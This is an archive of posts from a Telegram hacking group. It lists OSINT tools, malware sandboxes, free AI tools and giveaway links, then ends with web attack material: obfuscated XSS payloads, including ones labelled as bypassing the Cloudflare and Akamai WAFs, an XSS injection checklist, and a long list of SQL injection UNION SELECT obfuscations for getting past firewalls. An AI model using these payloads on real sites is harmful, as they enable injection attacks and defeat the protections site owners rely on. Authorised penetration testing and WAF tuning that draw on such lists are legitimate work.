Termux All Command [Telegram Group]
Відкрити в Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Показати більше1 327
Підписники
+524 години
+177 днів
+5730 день
Архів дописів
✍ DESKTOP APPLICATION PENETRATION TESTING - PRACTICAL GUIDE🔥
↪ I've just published 🔥 a new blog series on "Thick Client (Desktop) Application Penetration Testing."
📚 Start from here: https://lnkd.in/gyjUxqar
📚 Part-1: https://lnkd.in/g_SSbJ9N
📚 Part-2: https://lnkd.in/g-dnmmme
Thanks to learnOffSec 👏
🎁 Grab 1GB of Free Presentation Templates to make you look like a Pro
https://mega.nz/file/3Rs3kbIZ#T6CsKcyJm59iCWdkoS4e5Mfiv0Wh9Kt3J5DqpmCdhzw
Cursor Pro One Free For Student
https://www.cursor.com/students
🔍 Joe Sandbox – Analyze Any Malware Like a Pro!
Website: https://www.joesandbox.com
What it does:
Joe Sandbox is an advanced malware analysis platform used by cybersecurity pros to:
• Analyze suspicious files & URLs
• Detect evasion techniques
• Understand malware behavior in-depth
• Supports Windows, macOS, Android, iOS & Linux
• Offers rich static, dynamic, hybrid analysis
Use it for reverse engineering, threat hunting, and APT analysis.
1. General OSINT Tools
OSINT Framework
Google Dorks
theHarvester
SpiderFoot
Maltego
2. Social Media Tools
Social Searcher
CrowdTangle Link Checker
TweetDeck
Foller.me
Tinfoleak
3. Domain and IP Investigation
SecurityTrails API
BGPView
Whois Lookup
DNSstuff
IPinfo.io
4. Geolocation and Mapping
Google Maps API
OpenStreetMap
GeoIQ
Mapbox
5. Image and Video Analysis
TinEye Reverse Image Search
Google Images Reverse Search
InVID Verification Tool
6. Data Breach Checkers
Have I Been Pwned?
7. Malware Analysis
VirusTotal
8. Public Records and Databases
IntelligenceX - Public Records Search Engine
9. News and Trends Analysis
BuzzSumo
Free hands-on digital forensics labs for students and faculty
github.com/frankwxu/digital-forensics-lab
[10 Sandbox every Malware Analyst should know]
Cuckoo Sandbox – https://lnkd.in/dgzZiYzY
Any.Run – https://any.run/
Joe Sandbox (Community Edition) – https://lnkd.in/dwjPpwQT
IRMA (Incident Response & Malware Analysis) – https://lnkd.in/dzzwCHsk
Viper – https://lnkd.in/d6-U6YY4
Limon Sandbox – https://lnkd.in/dzM2--Ux
BinaryGuard – https://lnkd.in/dnEF-h-d
Hybrid Analysis – https://lnkd.in/dz3rmuwy
Filescan – https://lnkd.in/dgQM25_B
Sandblast (Checkpoint) – https://lnkd.in/drBEghCn
👍 XSS-Payload Anatomy
xss payload: %0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
😎 XSS Bug Bounty Methodology
1. Recon
Identify input fields, URLs, and parameters
Test GET & POST requests, headers, cookies
Look for WAF bypass opportunities
2. Injection Points
HTML context: <script>alert(1)</script>
Attribute context: onerror=alert(1)
JavaScript context: 'XSS'+alert(1)
Event handlers: onclick=alert(1)
JSON/XML: {"payload":"
50 ai Tools Free!!
✈️1. Text to Speech (Voice Generators) ❓
💵Murf.ai – Convert text into realistic voices.
💵Resemble.ai – Real-time voice cloning.
💵Lovo.ai – AI voiceovers for videos.
💵NaturalReader – Free text-to-speech for documents.
💵Balabolka – A free desktop voice tool.
🪙2. Text to Video 🎥
💵Pictory.ai – Convert blogs into short videos.
💵Synthesia – AI spokesperson videos from text.
💵Lumen5 – Social media video creator.
💵Runway ML – Advanced video editing and creation.
💵Wave.video – AI-driven video maker for marketing.
✅3. Image Editing/Creation ⭐️
💵Canva – AI tools for design and editing.
💵DALL-E – Generate images from text prompts.
💵DeepArt.io – Turn photos into artworks.
💵Remove.bg – Automatically remove image backgrounds.
💵Let'sEnhance.io – Upscale images without quality loss.
✔️4. Writing Assistants 🔼
💵ChatGPT – AI for conversation and writing.
💵Grammarly – Grammar and tone checker.
💵Writesonic – Write blogs, captions, and more.
💵Copy.ai – AI for business copywriting.
💵Jasper – High-quality AI content writer.
💯5. AI-Powered Design Tools 🖼
💵Figma – Interface design with AI plugins.
💵Artbreeder – Create and mix art styles.
💵Krita – Free AI-supported drawing tool.
💵Photopea – Photoshop-like free tool.
💵Autodraw – Turn sketches into professional icons.
🎈6. Code Generators 💻
💵GitHub Copilot – AI-powered code assistant.
💵Replit Ghostwriter – Code suggestions in real time.
💵TabNine – Autocomplete for developers.
💵CodeT5 – Open-source code generation.
💵DeepCode – AI for code reviews and debugging.
💵7. AI for Learning and Research 🎓
💵Perplexity.ai – AI-powered Q&A engine.
💵Elicit.org – Summarize research papers.
💵Scholarcy – Simplify academic articles.
💵Zotero – AI citation manager.
💵Wolfram Alpha – Computational knowledge engine.
🤑8. AI for Video Editing 🎬
💵Descript – Edit videos like text.
💵VEED.io – User-friendly video editor.
💵Kapwing – Online video editing platform.
💵Runway ML – Advanced tools for video editing.
💵Magisto – AI video creation for businesses.
💵9. Chatbots and Virtual Assistants 🤖
💵ManyChat – AI-powered chatbot for businesses.
💵Tidio – Live chat and chatbot for websites.
💵Ada – No-code chatbot builder.
💵Botpress – Open-source chatbot platform.
💵Drift – Conversational marketing chatbot.
💵10. AI-Powered Marketing Tools ↗️
💵HubSpot AI – AI-driven marketing and CRM.
💵Adzooma – Manage and optimize ads.
💵Phrasee – AI for ad copy and subject lines.
💵Crayon – AI for competitive intelligence.
💵GrowthBar – SEO and content creation AI.
🔖 JoeSandbox - Advanced Malware Analysis Tool
🧠 Analyze suspicious files, URLs, documents, and executables across multiple OS platforms (Windows, Linux, macOS, Android, iOS).
🔍 Combines static, dynamic & hybrid analysis for deep threat detection.
🛠️ Widely used by malware analysts, SOC teams & cyber researchers.
🔗 https://www.joesandbox.com
One-Liner - Extract all URLs from the Source Code
curl "http://testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'
Xss Payload
<input/onmouseover="javaSCRIPT:confirm(1)”bypass XSS Cloudflare WAF
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm1'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
///*!12345UNION SELECT*///
///*!50000UNION SELECT*///
//UNION///*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un//ion+se//lect
uni%0bon+se%0blect
%2f%2funion%2f%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
//union//select/**/
//uNIon//sEleCt/**/
+%2F**/+Union/*!select*/
///*!union*////*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
//union/*!50000select*///
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A///*!50000%55nIOn*//*yoyu*/all//%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f**U%0d%0aunion*/+/*!f**U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un//ion+sel//ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un//ion+se//lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2funion%2f%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
